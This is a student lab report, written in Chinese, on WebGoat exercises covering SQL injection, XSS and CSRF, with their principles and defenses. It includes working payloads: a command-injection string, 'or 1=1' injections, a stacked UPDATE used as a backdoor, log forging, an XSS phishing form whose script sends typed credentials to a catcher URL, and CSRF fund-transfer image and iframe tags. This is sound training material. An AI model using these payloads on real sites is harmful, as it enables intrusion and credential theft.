20165302 Exp9 Web安全基础

实验目的

本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验

基础问题回答

（1）SQL注入攻击原理，如何防御

• 所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。通过WEB表单递交查询字符的，这类表单特别容易受到SQL注入式攻击
• 防御：最常见的是在业务逻辑层中执行关键字检查。如果包含SQL的关键字，例如 *、or、select、delete等等关键字就进行替换；最有效的仍然是使用SQL变量进行查询，避免使用字符串来拼接SQL字符串。

（2）XSS攻击的原理，如何防御

• 原则是将一段JavaScript代码注入网页。然后当其他用户访问该页面时，他们将运行黑客编写的JS代码来实现一些帐户控制

存储XSS攻击：最后一次反射XSS攻击只能攻击点击该链接的某些用户。存储类型XSS可能会对所有用户带来攻击。经典的是用户签名栏。这个地方允许用户自定义。内容将存储在数据库中。当其他用户浏览他时，它将从数据库加载。如果恶意用户在其签名栏中注入了js参考，那么浏览他的所有人都将被Js控制

• 防御：关键字判断当有一个关键字如脚本、src来代替损坏；返回内容时进行转码，转码尖括号采用Unicode编码格式

（3）CSRF攻击原理，如何防御

• CSRF（Cross Site Request Forgery），中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后，诱使用户访问一个攻击页面，利用目标网站对用户的信任，以用户身份在攻击页面对目标网站发起伪造用户操作的请求，达到攻击目的。
• 防御：解决方案是向表单添加字段标记。黑客无法猜出已经改变的令牌，所以即使你添加一个UUID令牌，将它保存到服务器会话，黑客也不可能猜出随机令牌，就无法构造出能实现功能的链接了。

实验步骤

1.webgoat安装

• 在这个地址下载https://github.com/WebGoat/WebGoat/releases/tag/7.0.1

• 在虚拟机中含有这个文件包的目录下面运行java -jar webgoat-container-7.0.1-war-exec.jar
  

• 在浏览器输入localhost:8080/WebGoat下面有默认密码，登录即可开始试验
  

2.SQL注入攻击

（1）命令注入

• 右键点击页面，选择inspect Element审查网页元素对源代码进行修改,在复选框中任意一栏的代码，右键单击后，选择Edit At Html进行修改，添加"& netstat -an & ipconfig"
  
• 点击view，可以看到执行指令后的网络端口使用情况和IP地址。攻击成功！
  
  （2）数字型注入
• 右键点击页面，选择inspect Element审查网页元素对源代码进行修改，在选中的城市编号Value值中添加or 1=1
  
• 显示所有城市的天气情况
  

（3）日志欺骗

• 在User Name中填入webgoat%0d%0aLogin Succeeded for username: admin利用回车0D%和换行符%0A让其在日志中两行显示
  输入密码后点击Login，可以看到webgoat在Login Fail那行显示，我们自己添加的语句在下一行显示
  
• 攻击者可以利用这种方式向日志文件中添加恶意脚本，脚本的返回信息管理员能够通过浏览器看到。比如，将admin <script>alert(document.cookie)</script>作为用户名输入，可以看到弹窗的cookie信息。
  

(4)SQL 注入

• 点击Injection Flaws-String SQL Injection在Message里输入
  输入查询的用户名Smith' or 1=1--使用了'提前闭合""，插入永真式1=1，且--注释掉后面的内容，这样就能select表里面的所有数据
  
  (5) LAB: SQL Injection

• 在密码框输入' or 1=1 --，登录失败，会发现密码只有一部分输入，说明密码长度有限制。
  

• 在密码框右键选择inspect Element审查网页元素对长度进行修改修改成50试一下
  

(6)数据库后门

• 输入101，得到该用户的信息
  

• 输入注入语句101; update employee set salary=10000

• 成功创建后门
  

XSS攻击

(1) Phishing with XSS 跨站脚本钓鱼攻击

• 点击Cross-Site Scripting (XSS) Phishing with XSS
• 在页面的搜索框中输入代码<form> <br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> </form><br><br><HR>，可以出现如下的搜索框
  
• 输入代码

<script> function hack() { alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ""; } </script> <form> <br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form><br><br><HR>

• 输入后输入登录用户名和密码即可显示，WebGoat会将输入的信息捕获并反馈给我们
  
  (2) Stored XSS Attacks
• 在Message中构造语句
  title随意输入，输入后可以发现刚刚创建的帖子
  

CSRF攻击

（1）Cross Site Request Forgery

• 写一个URL放进Message框，使其他用户不可见，设置成一个隐藏图片，用户一旦点击就会触发一个CSRF事件
• 在Message里输入<img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" />
• 点击该消息，页面就会下载这个消息并显示，就会执行转走用户的存款
  (2)CSRF Prompt By-Pass
• 查看页面下侧Parameters中的src和menu值，命名title，message框中输入代码：

<iframe src="attack?Screen=[scr]menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>